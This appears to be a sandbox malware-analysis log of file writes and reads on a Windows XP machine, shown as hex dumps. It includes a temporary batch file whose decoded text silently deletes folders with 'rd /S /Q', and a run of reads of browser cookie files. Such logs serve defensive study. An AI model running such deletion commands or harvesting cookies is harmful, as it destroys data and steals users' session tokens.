C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 99 21 0E BB BA 67 24 15 C4 64 3C 37 3D 6C 54 0B 5A CF FB C6 AC 08 5C 2C 48 C2 7D F6 DE 31 94 AE EA C8 39 B6 06 07 60 63 D4 89 B0 9F 07 53 24 95 12 99 B1 6C A3 0C 8B 73 D5 78 07 8B A1 BB 93 3E 35 3E A8 04 03 F0 A1 92 CA 8B 6F 35 EE BE 33 99 2A 81 23 2D 0F 24 40 0F CA 8C 06 42 D1 E1 19 22 48 4F D4 E4 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 64 86 61 BB EB F4 CF 9F 97 BF 46 C0 FF F4 19 94 0A 0C 2C 70 41 F3 3F A1 3A 02 E2 32 66 48 39 4C EB 9B 1E 99 D7 79 0F 60 6F C5 1E 58 12 2B 7A 79 AF 0C F0 D5 E9 40 45 1F BC D7 9B A1 DA DB 1B 9A A9 14 1E 42 32 ED 88 A4 FC F1 09 B5 45 26 FC 3B 96 18 25 E2 2D D8 1D 82 69 0F 29 8D 7A 23 60 6C A1 9E E0 CA success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 6C 75 A2 8D 31 72 F1 A3 5E 50 ED 39 53 3A 83 BF F9 58 E0 29 83 C5 0A 41 63 38 AF C6 91 CA FA 77 BC 31 B9 46 77 6F 84 DE 5A 3B A7 53 97 1A C5 71 97 B1 0B 98 AC 9A 1E BC B8 CF 89 C0 CB 33 50 E5 23 BC 00 CE FC FB A5 24 2E E5 B2 72 29 36 24 41 36 66 56 C0 12 5C 7E 95 9A B5 D4 FC 7A 5F 20 6E 87 79 F9 E9 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 55 DF FB 34 21 8E 82 F1 05 A9 DD 6A 09 2C 6C 26 C3 FE 6A 49 3D E4 4E 7E C5 95 D4 28 23 C1 88 3B 1A EC A4 2C 06 3E 00 C0 B3 EF B5 2B F4 4E 8B 88 56 59 A4 7C 94 F7 E4 17 68 95 CF 66 DB 38 4E C2 A1 F8 32 BA B2 66 BE 23 92 07 E9 2F 72 AB 96 14 FF A0 2E AA EF 4C 56 A9 15 5B 33 91 B2 9A 78 B7 19 A9 3D 3A success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 47 16 31 87 DF 4B C8 C1 6E C4 05 8B EC BB 28 A3 3F 2B 4B 09 56 28 69 C3 99 C5 5D 06 F8 85 2E E5 F0 40 A4 C4 47 BF 20 D0 14 70 87 C4 DF 41 7D 63 6F 5A 4C 81 DA B4 C6 4B F3 10 75 C9 16 77 CF 1B 99 60 08 4B 0E 2B D6 67 C0 1A 54 23 93 3F F3 8A 6D 4B 1E BF 28 F0 89 72 42 30 E8 46 C7 0A E3 84 59 1B CB 89 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 F0 BB 4A AD BD 92 DF 03 56 3C C6 19 5D 67 A4 EB F6 05 92 85 D1 8E 97 0D EA E0 E1 56 BC A4 F5 39 30 89 FB 69 D3 1C BC 0E 35 72 4F 8C 60 CC F7 A8 D5 36 3D AF 44 68 46 05 65 3B C1 9A 20 83 79 0D A5 3D DE 63 47 83 83 5C 9C 5A C7 BC 93 7E 0E A6 89 7F 5E D3 D8 6F 11 2B 84 BD 58 9A 0C 97 09 3C 22 27 84 DF success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E0 7A AB 29 B6 64 36 09 DC 1C D2 4A 01 94 5D 59 3E 54 E3 69 EA 14 20 AB 88 7C 09 41 6D 20 90 2B 01 41 8B 3D 69 FE 00 11 C3 D7 38 CB 5A 69 08 7C 14 4F 7C 5C 2B BD 43 33 3F 0C 57 95 D3 B2 2B 28 CE F3 8D B1 22 AD 0A FC C2 4A 43 48 15 C3 C1 3C 63 A4 05 F6 BB 26 16 0B 87 8F 39 B9 5A A0 B7 41 22 DF 59 EF success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 97 2B F4 DB 30 C7 B2 CF 0A 5C 73 23 48 93 F9 EB 95 0A 71 FC 03 53 82 D6 5E D8 E0 CA D1 01 93 46 AE 54 9D E3 A3 27 13 17 4A B4 26 08 EE F3 94 0D A1 4A 83 36 39 FA 0E 64 DD 21 7C 40 B3 68 B6 62 2E D7 47 F8 30 4E 78 5F C5 8E 45 2C B6 7C B5 5C 13 72 A6 5C ED DC 8D 09 FD E6 1C 98 41 3F B2 4D 7C 3D 98 52 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E4 53 3B CB C0 3B D0 3D 6F 73 3A 50 80 15 EB 8C F7 D2 57 CE 71 89 06 57 D1 01 AA 74 3D CA 2B 8E 04 08 1D 6D 3D A4 60 39 3A 84 24 C4 43 58 1E CB 56 E3 67 F1 3F 44 E7 B8 7D 93 00 04 5A 1A 7F E5 D7 12 BF 2D D9 59 C9 EF C3 24 95 36 08 EB E4 DF 91 A4 28 53 08 DB EE 2D 41 39 81 BE 3E 9A 81 E8 DE 58 DB 3F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 1F B1 4D 5A F6 09 0F E7 6D 47 FC DC 0A 33 7C B7 3B DC DC 41 E0 72 B6 AE 39 0F DD A0 69 48 92 E4 4C 24 C7 C3 6C FD C0 A2 FC EF 53 DD BC 14 01 48 4A 99 E6 AE 6E FE A9 2B 3E 4D 63 09 09 9A BE E9 3D D0 BF 0F DF 1C CF 78 0D 50 72 87 2B D1 FB 5E 60 28 11 B2 1B D3 BB 0F 34 13 23 00 9A 4C 24 14 A8 77 03 43 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 C6 11 BD 48 D2 BF 05 A0 B4 A0 92 93 52 56 2F 88 C5 E2 F8 64 B1 09 8D DA 73 2B C8 1C 9F FB 67 76 CB 6C 86 92 FD 23 94 F4 90 97 7D C1 DB EE E5 21 5F A6 6F F1 24 48 47 46 76 13 FC ED 9E 7C 77 B5 DA E2 19 1E CD B7 D3 DA A2 06 55 67 E9 7D 1B E7 88 7B 3B 98 02 0B 8B 2D E3 B1 D6 71 C0 2A 31 EA 52 60 6A D4 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 45 86 E2 26 84 33 7B BD DA 94 CB 05 CB 8E 38 E1 1A 1B DE 83 EE 83 4E C9 E1 6E BB 27 08 B4 DE E0 D2 79 B7 1C 08 B5 14 03 42 DB C2 DD 3B CF 52 BF 5F 38 91 41 49 C0 8F C8 22 A2 F9 B4 11 65 1C 14 45 7B B5 72 41 F9 FD 4B E5 32 08 4B 2B 6D 3E 26 37 A4 CC B7 14 34 C3 63 21 21 88 F3 96 51 8F D3 42 F5 EA 44 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 E5 62 4D 93 43 E1 F9 4D 0E 85 91 3C 76 5A 00 74 E3 0C 35 EC DA 89 05 37 DA C7 8F A4 CC F9 24 DB 1F 41 F3 72 D3 20 A2 40 0C CD 3B 0A D4 1E 74 5D F2 32 D9 72 61 4B 93 12 4F 80 3D 55 CC 2E DC 84 3F 57 24 BF 22 C3 EB 32 2D 50 FA ED B9 0C 68 41 8F 95 83 72 5D C8 4F 72 9E 19 B3 48 7F CC 9D A3 02 1A 3F F7 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 79 45 F7 35 5A CC E9 5E 7B C6 CD 62 EA 48 85 12 E5 21 ED 74 83 A2 25 AD ED A8 0D DF E0 13 E9 99 CC 88 D8 E7 FB 6C 54 71 C4 67 7F 06 3A 78 B0 85 3D 22 CA 97 70 52 0A F6 2B 6E 67 AE 28 74 C1 99 96 07 82 E4 55 C7 E3 B9 B7 4A 93 76 9D 27 78 50 F3 FB 65 AB E4 D6 C9 04 A4 EA E4 FA 9E A1 E7 7D 7C 2F 8E F1 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 F0 5E E3 6E FE 69 0C FF 5C A3 90 11 C8 13 B5 D0 62 A1 31 D5 43 DE 59 86 E0 9D 5E EF E4 AB BF 02 0E D1 F7 FE CC DD 16 E1 7B AB B3 8A CE 1B E1 B4 38 4F 6C 56 D5 4C F6 C2 52 4A 54 DC D8 96 CC 7E 66 18 3D B4 78 14 39 AB 58 36 29 17 29 50 8B D7 3C B7 20 A1 74 F5 0F B8 1C 34 43 B4 5A A2 F7 BA 08 97 0D 6F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 75 C6 03 D3 5E 26 EE 7B 44 60 57 30 0C BC 13 BA 64 80 EF 96 96 BD 44 9A F2 B1 16 E5 D3 A0 93 E7 6C 1F 40 6A 9E 12 57 A2 6C 4D 9B B5 F7 79 45 CA 19 05 2A 69 D6 15 12 D9 D2 03 52 C3 D3 84 82 58 A2 76 07 37 72 90 FF 08 F5 99 D8 F1 3C B7 4F 7F 3A FC 74 9D 13 A4 1C D7 15 8A DD 06 B9 73 0E 06 9F 39 65 01 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 AE 8B F3 EC EC 9A BF BC 8C 2E 61 D2 36 44 41 85 C2 34 10 70 09 23 9A 76 2F 07 EC FD 89 BE B0 DB C5 A5 96 6A CC 13 F7 4A CE 2B 88 D4 4E 37 D2 28 0E E9 92 6D 49 59 0E 6E 69 65 95 6A 1F CB C6 16 EA 3D F2 C7 DA 8F 1F 22 AE BB 5E 11 9C D0 F8 BB FC D5 6E F5 74 18 48 5B 99 81 0F 81 9E 01 C5 69 FA 9B C2 E6 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 4096 C1 37 E5 67 CB 5E 73 D8 5B 88 F8 C7 95 4E 72 59 D5 95 AC 28 B9 2D 5E CE 6E 7B 87 E8 20 75 95 16 6C 0A D4 9F 3F 4E 01 0B 8D 99 16 A6 2A 6F B4 36 62 33 E6 61 4B CF D8 86 87 18 82 95 4E A5 2B D2 8F 12 9D 09 5C 4E 74 C4 1B A9 38 21 A3 BA 1B FB 8D D5 35 AF 17 4E A3 76 CA DC 22 37 1A 08 C0 4F 49 1C 50 3D success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin none 3090 3D DA 00 B7 2C F6 EF 92 FD B5 B9 ED 86 86 47 E7 E3 8E D9 08 D5 5F B3 C6 54 ED 57 A0 E1 31 51 2B 54 BD 62 13 D0 06 7B 2A 0A 3A 35 67 C5 36 B7 40 FE B3 27 0F 87 CF 90 15 2F FC 1E 9A 32 62 5D B0 1E 9E 32 F7 F7 01 70 F8 9C 6F 74 73 4A 2E 1A 68 DF EC 83 31 E8 55 6E 79 CC 1F 30 AC 04 05 BD 18 0F C9 DE 91 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 3C 21 64 6F 63 74 79 70 65 20 68 74 6D 6C 3E 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 58 2D 55 41 2D 43 6F 6D 70 61 74 69 62 6C 65 22 20 63 6F 6E 74 65 6E 74 3D 22 49 45 3D 65 64 67 65 22 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 63 6F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 64 64 69 6E 67 3A 31 30 70 78 20 30 3B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 7A 2D 69 6E 64 65 78 3A 32 3B 7A 6F 6F 6D 3A 31 7D 2E 67 62 74 7B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 64 69 73 70 6C 61 79 3A 2D 6D 6F 7A 2D 69 6E 6C 69 6E 65 2D 62 6F 78 3B 64 69 73 70 6C success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 65 7B 66 6F 6E 74 2D 77 65 69 67 68 74 3A 62 6F 6C 64 7D 23 67 62 6D 70 70 7B 64 69 73 70 6C 61 79 3A 6E 6F 6E 65 7D 23 67 62 64 34 20 2E 67 62 6D 63 63 7B 6D 61 72 67 69 6E 2D 74 6F 70 3A 35 70 78 7D 2E 67 62 70 6D 63 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 65 64 66 65 65 61 7D 2E 67 62 70 6D 63 20 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 61 74 69 6F 6E 3A 6E 6F 6E 65 7D 23 73 73 2D 62 6F 78 20 61 3A 68 6F 76 65 72 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 34 44 39 30 46 45 3B 63 6F 6C 6F 72 3A 23 66 66 66 21 69 6D 70 6F 72 74 61 6E 74 7D 61 2E 73 73 2D 73 65 6C 65 63 74 65 64 7B 63 6F 6C 6F 72 3A 23 32 32 32 21 69 6D 70 6F 72 74 61 6E success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 67 72 6F 75 6E 64 2D 69 6D 61 67 65 3A 2D 6D 73 2D 6C 69 6E 65 61 72 2D 67 72 61 64 69 65 6E 74 28 74 6F 70 2C 23 64 64 34 62 33 39 2C 23 62 30 32 38 31 61 29 3B 66 69 6C 74 65 72 3A 70 72 6F 67 69 64 3A 44 58 49 6D 61 67 65 54 72 61 6E 73 66 6F 72 6D 2E 4D 69 63 72 6F 73 6F 66 74 2E 67 72 61 64 69 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 63 3D 61 3B 43 3D 63 2B 31 7D 2C 44 3D 5B 5D 2C 43 3D 30 3B 6E 28 22 6C 6F 67 67 65 72 22 2C 7B 69 6C 3A 42 2C 6D 6C 3A 41 7D 29 3B 76 61 72 20 46 3D 77 69 6E 64 6F 77 2E 67 62 61 72 2E 6C 6F 67 67 65 72 3B 76 61 72 20 47 3D 5F 74 76 66 28 22 30 2E 30 31 22 2C 31 2E 30 45 2D 34 29 2C 48 3D 30 3B 0A success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 2C 69 29 3B 57 28 61 2C 22 22 29 7D 7D 2C 4B 61 3D 66 75 6E 63 74 69 6F 6E 28 61 29 7B 74 72 79 7B 55 28 29 3B 76 61 72 20 62 3D 61 7C 7C 64 6F 63 75 6D 65 6E 74 2E 67 65 74 45 6C 65 6D 65 6E 74 42 79 49 64 28 54 29 3B 69 66 28 62 29 7B 57 28 62 2C 22 54 68 69 73 20 73 65 72 76 69 63 65 20 69 73 20 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 61 70 70 65 6E 64 43 68 69 6C 64 28 62 2E 63 6C 6F 6E 65 4E 6F 64 65 28 74 72 75 65 29 29 7D 63 61 74 63 68 28 65 29 7B 63 28 65 29 7D 7D 3B 61 2E 61 6F 6D 63 3D 66 3B 7D 63 61 74 63 68 28 65 29 7B 77 69 6E 64 6F 77 2E 67 62 61 72 26 26 67 62 61 72 2E 6C 6F 67 67 65 72 26 26 67 62 61 72 2E 6C 6F 67 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 69 64 3D 67 62 5F 32 35 20 68 72 65 66 3D 22 68 74 74 70 73 3A 2F 2F 64 6F 63 73 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 3F 74 61 62 3D 77 6F 22 20 6F 6E 63 6C 69 63 6B 3D 22 67 62 61 72 2E 6C 6F 67 67 65 72 2E 69 6C 28 31 2C 7B 74 3A 32 35 7D 29 22 3E 44 6F 63 75 6D 65 6E 74 73 3C 2F 61 3E 3C 2F 6C 69 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 3E 20 3C 2F 64 69 76 3E 20 3C 2F 74 64 3E 20 3C 2F 74 72 3E 20 3C 2F 74 61 62 6C 65 3E 20 3C 2F 74 64 3E 20 3C 74 64 3E 20 20 3C 64 69 76 20 63 6C 61 73 73 3D 22 6E 6F 6A 73 76 22 20 73 74 79 6C 65 3D 22 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 68 65 69 67 68 74 3A 33 30 70 78 22 20 69 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 6F 67 6C 65 2E 6D 73 67 26 26 67 6F 6F 67 6C 65 2E 6D 73 67 2E 73 65 6E 64 28 36 34 29 7D 66 75 6E 63 74 69 6F 6E 20 76 28 61 29 7B 76 61 72 20 62 3D 66 61 6C 73 65 3B 74 72 79 7B 62 3D 77 69 6E 64 6F 77 2E 65 78 74 65 72 6E 61 6C 2E 69 73 47 6F 6F 67 6C 65 48 6F 6D 65 50 61 67 65 28 29 7D 63 61 74 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 4096 34 41 43 77 72 4D 4B 77 42 4F 41 41 73 4B 7A 42 30 4F 41 41 73 4B 7A 41 64 4F 41 41 73 4B 7A 42 63 4F 41 41 73 4B 7A 41 59 4F 41 41 73 4B 7A 41 6D 4F 41 41 73 67 41 4A 66 6B 41 4A 62 2F 4E 65 57 39 6F 41 64 45 79 6A 45 2E 6A 73 27 29 3B 67 6F 6F 67 6C 65 2E 78 6A 73 3D 31 7D 28 66 75 6E 63 74 69 6F success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt none 2852 39 32 2C 7B 22 61 65 22 3A 74 72 75 65 2C 22 61 76 67 54 74 66 63 22 3A 32 30 30 30 2C 22 62 70 65 22 3A 66 61 6C 73 65 2C 22 62 72 62 61 22 3A 66 61 6C 73 65 2C 22 64 6C 65 6E 22 3A 32 34 2C 22 66 62 64 63 22 3A 35 30 30 2C 22 66 62 64 75 22 3A 33 30 30 30 2C 22 66 62 68 22 3A 74 72 75 65 2C 22 66 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm none 93 28 3F DF CC 1A 3B 7B 91 90 86 C1 7C 38 88 CF A9 A5 C2 5C DF D9 49 56 15 DB 68 4C D1 02 EB EB 9C F4 35 B3 26 CF 10 3B F5 5E CD 6F 93 6B 5D 93 1D 8F 1B 26 D0 A2 79 08 73 26 79 27 D3 60 82 77 DA A3 78 7A 52 3A A7 8A A2 6F A2 9A 37 E8 99 47 A9 76 0E 45 BF AD 73 00 0F 7B 90 A5 4D E9 success or wait 1 1F87A65
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm none 64 8C 75 87 84 27 E6 70 83 E6 84 3E 81 1E 7B E6 BD D9 9D EF 62 79 E9 F6 B5 7B C8 EC 71 A2 4B 4B 3C 4B 2F FD DD 66 CC 33 A9 FA 26 DE B4 F1 BE 2F 26 B5 21 1C EA 98 43 32 49 01 5E 00 F4 5A B8 4D E0 success or wait 1 1F87A65
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 392 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 1 1F8AE50
+ File read
File Path Offset Length Value Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt none 222 75 0A 34 64 64 61 36 36 61 37 30 64 38 61 62 0A 61 64 2E 77 73 6F 64 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 30 38 39 30 39 33 31 32 30 0A 33 30 31 35 39 32 38 30 0A 32 30 33 37 32 36 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A 69 5F 31 0A 33 33 3A 39 36 37 3A 35 35 35 3A 30 3A 30 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 30 32 32 37 39 33 35 36 7C 73 65 73 73 69 6F 6E 23 31 33 30 32 32 37 39 32 34 30 39 31 38 2D 39 35 32 36 31 35 23 31 33 30 32 32 38 31 31 35 36 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 31 38 34 39 37 36 38 34 34 38 0A 33 30 31 34 34 30 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt none 232 6D 62 6F 78 0A 63 68 65 63 6B 23 74 72 75 65 23 31 33 32 31 30 31 31 39 36 32 7C 73 65 73 73 69 6F 6E 23 31 33 32 31 30 31 31 39 30 31 36 37 39 2D 32 31 30 36 33 34 23 31 33 32 31 30 31 33 37 36 32 0A 61 64 6F 62 65 2E 63 6F 6D 2F 0A 31 36 30 30 0A 32 39 31 31 31 35 33 34 30 38 0A 33 30 31 38 37 36 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt none 102 4D 55 49 44 0A 39 37 41 30 45 44 32 45 45 39 33 35 34 37 33 44 38 37 46 43 37 45 37 30 37 32 35 45 45 30 35 37 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 32 38 35 30 36 31 36 33 32 0A 33 30 31 38 34 33 38 33 0A 32 37 31 36 30 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt none 101 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 33 33 31 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt none 191 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 61 74 64 6D 74 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 34 37 35 38 30 30 31 39 32 0A 33 30 31 39 33 32 37 33 0A 32 34 33 35 32 36 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt none 204 53 52 43 48 44 0A 4D 53 3D 31 37 38 33 35 38 30 26 44 3D 31 37 38 33 35 35 32 26 41 46 3D 4E 4F 46 4F 52 4D 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 38 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 35 38 32 30 35 35 36 38 0A 33 30 31 35 33 30 34 32 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt none 291 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 39 30 34 31 37 36 36 34 0A 33 30 31 38 34 32 34 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A 53 52 43 48 44 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt none 69 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 34 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 31 31 34 34 30 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt none 68 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 39 32 34 33 35 38 31 34 34 0A 33 30 31 34 34 36 31 31 0A 34 30 38 37 30 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt none 67 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 35 36 34 30 33 34 38 31 36 0A 33 30 31 34 34 37 35 34 0A 32 37 33 34 38 31 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt none 67 41 4E 4F 4E 43 48 4B 0A 30 0A 63 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 37 35 34 37 37 33 33 37 36 0A 33 30 31 35 33 36 34 34 0A 32 34 35 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt none 83 50 4F 50 55 50 43 48 45 43 4B 0A 31 33 30 32 33 36 35 36 33 31 36 36 38 0A 63 68 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 34 39 31 32 31 31 31 33 36 0A 33 30 31 34 34 32 30 39 0A 34 30 38 31 32 38 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt none 122 69 64 0A 63 38 32 63 64 65 37 33 37 30 30 30 30 65 31 7C 7C 74 3D 31 33 30 36 31 36 30 34 33 35 7C 65 74 3D 37 33 30 7C 63 73 3D 79 67 31 65 38 31 65 2D 0A 64 6F 75 62 6C 65 63 6C 69 63 6B 2E 6E 65 74 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 35 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt none 88 69 30 30 0A 30 31 37 62 34 64 61 30 32 33 39 36 65 62 35 31 30 30 30 36 0A 69 76 77 62 6F 78 2E 64 65 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 36 35 36 30 35 35 30 34 0A 33 30 32 31 37 35 37 36 0A 32 36 39 34 34 39 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt none 99 4D 55 49 44 0A 37 32 44 35 36 35 34 38 34 31 37 31 34 45 38 32 42 39 33 39 31 41 42 33 35 41 32 31 37 34 42 30 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 33 34 36 39 33 37 36 33 32 0A 33 30 31 34 34 30 30 38 0A 2A 0A success or wait 1 1F8AEF0
